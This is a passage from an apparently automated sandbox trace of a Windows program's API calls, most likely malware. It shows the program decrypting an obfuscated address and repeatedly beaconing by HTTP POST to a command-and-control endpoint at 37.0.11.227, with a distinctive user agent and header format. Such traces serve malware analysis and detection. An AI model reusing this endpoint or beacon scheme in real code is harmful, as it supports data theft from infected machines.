Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0246.534] recv (in: s=0x6b8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0246.602] GetProcessHeap () returned 0x690000 [0246.603] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0246.603] GetProcessHeap () returned 0x690000 [0246.603] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0246.605] GetProcessHeap () returned 0x690000 [0246.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0246.605] GetProcessHeap () returned 0x690000 [0246.605] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aed48 | out: hHeap=0x690000) returned 1 [0246.606] closesocket (s=0x6b8) returned 0 [0246.606] GetProcessHeap () returned 0x690000 [0246.606] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0246.606] GetProcessHeap () returned 0x690000 [0246.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0246.607] GetProcessHeap () returned 0x690000 [0246.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0246.607] GetProcessHeap () returned 0x690000 [0246.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0246.608] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1410) returned 0x6b8 [0246.610] Sleep (dwMilliseconds=0xea60) [0246.612] GetProcessHeap () returned 0x690000 [0246.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0246.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.613] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.619] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0246.625] GetProcessHeap () returned 0x690000 [0246.625] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0246.626] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.626] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0246.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.629] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.630] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.630] GetProcessHeap () returned 0x690000 [0246.631] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0246.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.645] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0246.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.647] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0246.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.648] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0246.648] GetProcessHeap () returned 0x690000 [0246.648] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0246.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.649] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0246.650] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.650] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0246.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.661] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0246.662] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.663] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0246.663] GetProcessHeap () returned 0x690000 [0246.663] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0246.663] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0246.663] GetProcessHeap () returned 0x690000 [0246.664] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0246.664] GetProcessHeap () returned 0x690000 [0246.664] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0246.664] GetProcessHeap () returned 0x690000 [0246.664] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0246.664] GetProcessHeap () returned 0x690000 [0246.664] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0246.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.666] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.674] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0246.683] GetProcessHeap () returned 0x690000 [0246.683] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0246.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.684] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0246.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.685] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.686] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.686] GetProcessHeap () returned 0x690000 [0246.687] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0246.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.688] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0246.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.689] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0246.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.690] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0246.690] GetProcessHeap () returned 0x690000 [0246.690] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0246.691] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.691] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0246.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.692] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0246.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.693] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0246.694] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.694] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0246.694] GetProcessHeap () returned 0x690000 [0246.694] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0246.694] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0246.695] GetProcessHeap () returned 0x690000 [0246.695] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0246.695] socket (af=2, type=1, protocol=6) returned 0x6bc [0246.696] connect (s=0x6bc, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0246.720] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0246.720] GetProcessHeap () returned 0x690000 [0246.720] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0246.720] GetProcessHeap () returned 0x690000 [0246.720] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0246.721] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0246.722] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0246.722] GetProcessHeap () returned 0x690000 [0246.722] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0246.722] GetProcessHeap () returned 0x690000 [0246.723] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0246.723] GetProcessHeap () returned 0x690000 [0246.723] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0246.723] GetProcessHeap () returned 0x690000 [0246.723] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0246.724] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0246.725] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0246.725] GetProcessHeap () returned 0x690000 [0246.725] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0246.725] GetProcessHeap () returned 0x690000 [0246.726] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0246.726] send (s=0x6bc, buf=0x6ad508*, len=242, flags=0) returned 242 [0246.726] send (s=0x6bc, buf=0x6aba40*, len=159, flags=0) returned 159 [0246.727] GetProcessHeap () returned 0x690000 [0246.727] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0246.727] recv (in: s=0x6bc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0246.801] GetProcessHeap () returned 0x690000 [0246.802] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0246.803] GetProcessHeap () returned 0x690000 [0246.803] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0246.804] GetProcessHeap () returned 0x690000 [0246.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0246.804] GetProcessHeap () returned 0x690000 [0246.804] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0246.804] closesocket (s=0x6bc) returned 0 [0246.806] GetProcessHeap () returned 0x690000 [0246.806] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0246.806] GetProcessHeap () returned 0x690000 [0246.806] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0246.806] GetProcessHeap () returned 0x690000 [0246.807] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0246.807] GetProcessHeap () returned 0x690000 [0246.807] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0246.807] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1414) returned 0x6bc [0246.809] Sleep (dwMilliseconds=0xea60) [0246.811] GetProcessHeap () returned 0x690000 [0246.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0246.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.812] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.818] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0246.845] GetProcessHeap () returned 0x690000 [0246.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0246.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.846] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0246.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.847] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.848] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.848] GetProcessHeap () returned 0x690000 [0246.849] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0246.850] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.850] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0246.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.857] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0246.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.868] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0246.868] GetProcessHeap () returned 0x690000 [0246.868] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0246.869] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.869] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0246.870] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.870] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0246.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.871] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0246.871] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.872] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0246.872] GetProcessHeap () returned 0x690000 [0246.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0246.872] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0246.872] GetProcessHeap () returned 0x690000 [0246.872] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0246.873] GetProcessHeap () returned 0x690000 [0246.873] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0246.873] GetProcessHeap () returned 0x690000 [0246.873] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0246.873] GetProcessHeap () returned 0x690000 [0246.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0246.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.874] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0246.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.884] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0246.893] GetProcessHeap () returned 0x690000 [0246.893] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0246.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.894] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0246.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.895] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0246.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.897] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0246.897] GetProcessHeap () returned 0x690000 [0246.897] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0246.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.899] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0246.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.900] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0246.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0246.901] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0246.901] GetProcessHeap () returned 0x690000 [0246.901] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0246.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.902] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0246.903] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.903] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0246.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.905] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0246.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0246.906] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0246.906] GetProcessHeap () returned 0x690000 [0246.906] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0246.906] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0246.906] GetProcessHeap () returned 0x690000 [0246.906] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3c0 [0246.906] socket (af=2, type=1, protocol=6) returned 0x6c0 [0246.907] connect (s=0x6c0, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0246.934] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0246.934] GetProcessHeap () returned 0x690000 [0246.934] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0246.934] GetProcessHeap () returned 0x690000 [0246.934] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0246.934] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0246.935] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0246.935] GetProcessHeap () returned 0x690000 [0246.935] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afd40 [0246.935] GetProcessHeap () returned 0x690000 [0246.936] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0246.936] GetProcessHeap () returned 0x690000 [0246.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0246.936] GetProcessHeap () returned 0x690000 [0246.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0246.937] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0246.937] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0246.937] GetProcessHeap () returned 0x690000 [0246.937] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0246.937] GetProcessHeap () returned 0x690000 [0246.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0246.938] send (s=0x6c0, buf=0x6ad508*, len=242, flags=0) returned 242 [0246.939] send (s=0x6c0, buf=0x6aba40*, len=159, flags=0) returned 159 [0246.939] GetProcessHeap () returned 0x690000 [0246.939] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0246.939] recv (in: s=0x6c0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0247.021] GetProcessHeap () returned 0x690000 [0247.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0247.022] GetProcessHeap () returned 0x690000 [0247.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0247.022] GetProcessHeap () returned 0x690000 [0247.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afd40 | out: hHeap=0x690000) returned 1 [0247.022] GetProcessHeap () returned 0x690000 [0247.022] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0247.022] closesocket (s=0x6c0) returned 0 [0247.023] GetProcessHeap () returned 0x690000 [0247.023] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3c0 | out: hHeap=0x690000) returned 1 [0247.023] GetProcessHeap () returned 0x690000 [0247.023] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0247.024] GetProcessHeap () returned 0x690000 [0247.024] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: 